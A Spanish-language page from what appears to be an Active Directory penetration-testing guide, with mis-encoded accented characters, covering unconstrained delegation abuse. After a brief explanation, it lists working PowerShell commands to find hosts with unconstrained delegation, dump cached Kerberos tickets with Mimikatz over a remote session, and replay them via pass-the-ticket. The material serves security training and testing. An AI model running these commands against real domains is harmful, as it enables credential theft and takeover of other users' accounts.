馃數
Active Directory Penetration Testing
  • Inicio
  • General
    • Recursos de aprendizaje
    • Herramientas
  • Recolecci贸n de informaci贸n y enumeraci贸n
    • Bypass protecciones PowerShell scripts
    • LLMNR/NBT-NS poisoning
    • Enumeraci贸n no autenticada
      • Enumeraci贸n de usuarios y grupos
      • Enumeraci贸n de pol铆tica de contrase帽as
    • Password spraying
    • Enumeraci贸n autenticada
      • BloodHound
      • Domain Name System (DNS)
      • Enumeraci贸n de dominios
      • Enumeraci贸n de usuarios, grupos y computadoras
      • Enumeraci贸n de recursos compartidos
      • Enumeraci贸n de pol铆tica de contrase帽as
      • Enumeraci贸n de Group Policy Object (GPO)
      • Enumeraci贸n de Access Control List (ACL)
      • Enumeraci贸n de relaciones de confianza de dominio
  • Movimiento lateral
    • User hunting
    • Microsoft SQL Server (MSSQL)
    • PowerShell remoting
    • Remote Desktop Protocol (RDP)
    • Server Message Block (SMB)
    • Windows Remote Management (WinRM)
    • Pass the Hash (PtH)
    • Pass the Ticket (PtT)
  • Escalamiento de privilegios de dominio
    • Configuraciones incorrectas
    • Credential dumping
    • Usuarios y grupos
    • ASREPRoast
    • Kerberoast
    • DCSync
    • Unconstrained delegation
    • Constrained delegation
  • Escalamiento de privilegios en relaciones de confianza de dominio
    • Kerberoast
    • Foreign group membership
    • SID History
  • Persistencia
    • Golden Ticket
    • Silver Ticket
    • Skeleton Key
    • Directory Services Restore Mode (DSRM)
  • Vulnerabilidades
    • NoPac
    • PrintNightmare
Con tecnolog铆a de GitBook
En esta p谩gina
  • Descripci贸n
  • Windows

驴Te fue 煤til?

  1. Escalamiento de privilegios de dominio

Unconstrained delegation

Descripci贸n

La delegaci贸n es el acto de dar a alguien autoridad o responsabilidad para hacer algo en nombre de otra persona. En Active Directory, la delegaci贸n es una caracter铆stica que permite que cuentas espec铆ficas (usuario o computadora) se hagan pasar por otras cuentas para acceder a servicios particulares en la red.

Unconstrained delegation es un privilegio que los administradores de dominio pueden asignar a una computadora o un usuario del dominio.

El controlador de dominio coloca el TGT (Ticket Granting Ticket) del usuario dentro del TGS (Ticket Granting Service) solicitado por 茅l. Cuando el TGS se presenta al servidor que tiene el privilegio de unconstrained delegation este extrae el TGT del usuario desde el TGS y el servidor almacena en su memoria el TGT. De esta forma, el servidor puede reutilizar el TGT del usuario para acceder a cualquier otro recurso como el usuario.

Un atacante con acceso al servidor podr铆a volcar todos los TGT de los usuarios que se encuentren almacenados en la memoria del servidor.

Windows

1) Obtener servidores con privilegio de unconstrained delegation.

# PowerView
Get-DomainComputer -Unconstrained | Select -ExpandProperty Name

# M贸dulo ActiveDirectory PowerShell
Get-ADComputer -Filter {TrustedForDelegation -eq $True}

2) Acceso a servidor con privilegio de unconstrained delegation y obtenci贸n de TGT (Ticket Granting Ticket) almacenados en memoria.

$session = New-PSSession -ComputerName <computer-name>
Invoke-Command -FilePath C:\<path>\Invoke-Mimikatz.ps1 -Session $session
Enter-PSSession -Session $session
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

3) Realizaci贸n de Pass the Ticket (PtT).

Invoke-Mimikatz -Command '"kerberos::ptt ticket.kirbi"'
Invoke-Command -ComputerName <computer-name> -ScriptBlock {hostname; whoami; ipconfig}
AnteriorDCSyncSiguienteConstrained delegation

脷ltima actualizaci贸n hace 2 a帽os

驴Te fue 煤til?